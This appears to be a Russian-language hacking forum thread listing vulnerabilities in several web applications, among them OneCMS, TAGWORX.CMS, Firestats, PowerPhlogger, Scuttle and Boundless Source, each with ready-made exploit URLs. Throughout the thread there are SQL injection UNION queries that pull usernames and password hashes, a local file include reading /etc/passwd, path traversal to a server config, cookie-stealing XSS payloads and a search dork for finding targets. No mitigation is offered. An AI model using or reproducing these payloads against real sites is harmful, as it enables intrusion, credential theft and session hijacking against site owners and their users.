![]() |
Раскрытие пути в Sypex Dumper Lite 1.0.8:
Если скриптом хоть раз пользовались то: Код:
http://site/backup/dumper.cfg.phpТакже, при неправильном вводе пароля виден DBHOST и есть возможность вводить теги в поле логина, но смысла в этом особого нет, т.к. длина режется до 16 символов. |
mamba.ru
------------------- ищем в гугле Цитата:
site.com/journal/contentcategory.phtml?cat_id=5[код] |
OneCMS 2.5 Local File Include
Продукт: OneCMS
Версия: 2.5 Производитель: http://www.insanevisions.com/ Воздействие: Local File Include Ошибка присутствует в скрипте install_mod.php Пример: Код:
http://site.ru/onecms/install_mod.php?act=go&load=shell.php../../../../../../../../../../../../../etc/passwd |
TAGWORX.CMS Remote SQL Injection
Продукт: TAGWORX.CMS
Версия: 3.00.02 Производитель: http://www.tagworx.net/ Воздействие: Remote SQL Injection Ошибка существует из-за недостаточной обработки данных в параметре "cid" в скрипте contact.php и в параметре "nid" в скрипте news.php Пример: Код:
http://site.ru/contact.php?cid=-1+UNION+SELECT+concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user-- |
локальные сервера wow
wow-ultimate <= 2.0
sql inj: Код:
gilds.php?guid=[sql]local file including: Код:
lk_n?nw=../../../../mangos/mangosd.conf%00Код:
http://site/forum/uploads/monthly_05_2008/ |
Биллинговая система UTM от фирмы NetUp
|
Статистика/счётчик Firestats 1.4.4-stable:
XSS: Код:
http://site/stats/php/window-delete-site.php?site_id=')"><script>alert(/XSS/)</script>Код:
http://site/stats/php/page-database.phpКод:
http://site/stats/tools.php?file_id=manage_usersКод:
http://site/stats/php/page-users.phpКод:
stats/integration/mediawiki/firestats-mediawiki.phpПапка со статистикой может называться и не stats. Багов больше, толком не рылся, это то, что сразу на глаза попалось. |
PowerPhlogger 2.2.5
Уязвимости выкладываю в порядке мною нахождения их:)Все проверялись на версии 2.2.5
XSS: Post-запрос на странице http://site/dspLogs.php Код:
"><script>alert(document.cookie)</script>XSS: Код:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
<meta name="PHP Version" content="..." />На странице http://site/dspStats.php?edit=mp в логах посещений фильтруется информация про страницы сайта,если счетчик установленный на индексной странице то можно указать код в качестве адреса страницы) Код:
http:/site/<script>alert(document.cookie)</script>Код:
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EFull path disclosure: Код:
http://site/include/edCss.inc.phpЕще XSS(найденые мною давно): Post запрос на странице http://site/edUserprofile.php (возможны как Get так и Post запросы) Код:
</textarea><script>alert(document.cookie)</script>Код:
"><script>alert(document.cookie)</script>Код:
"><script src=http://site.comXSS: Код:
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=editКод:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edithttp://site/newaccount_self.php Скрипт редеректит сам себя.Mozilla автомаматический останавливает процесс,а вот ИЕ-нет.Поэтому если клиент,который обращается к скрипту сам не остановит редирект(например какой-то бот поисковых систем) то создается большая нагрузка на сервер. Information Leakage: http://site/main_location.inc XSS: Код:
http://site/dspLogs.php/%22%3E%3Cscript%20src=script.js%20Код:
http://site/dspStats.php/%22%3E%3Cscript%20src=script.js%20Код:
http://site/edCss.php/%22%3E%3Cscript%20src=script.js%20 |
Scuttle
XSS:
Код:
http://site/bookmarks/%3CBODY%20onload=alert(document.cookie)%3EКод:
http://site/?sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
</textarea><script>alert(document.cookie)</script>Код:
http://site.com/help/syntax.html?la=/../query |
Boundless Source
XSS:
Код:
http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sparam=all&category=cat20Код:
http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EНа странице http://site/catalog/add-lnk.cgi?cmd=showform пишем Код:
<BODY onload=alert(document.cookie) |
| Время: 06:10 |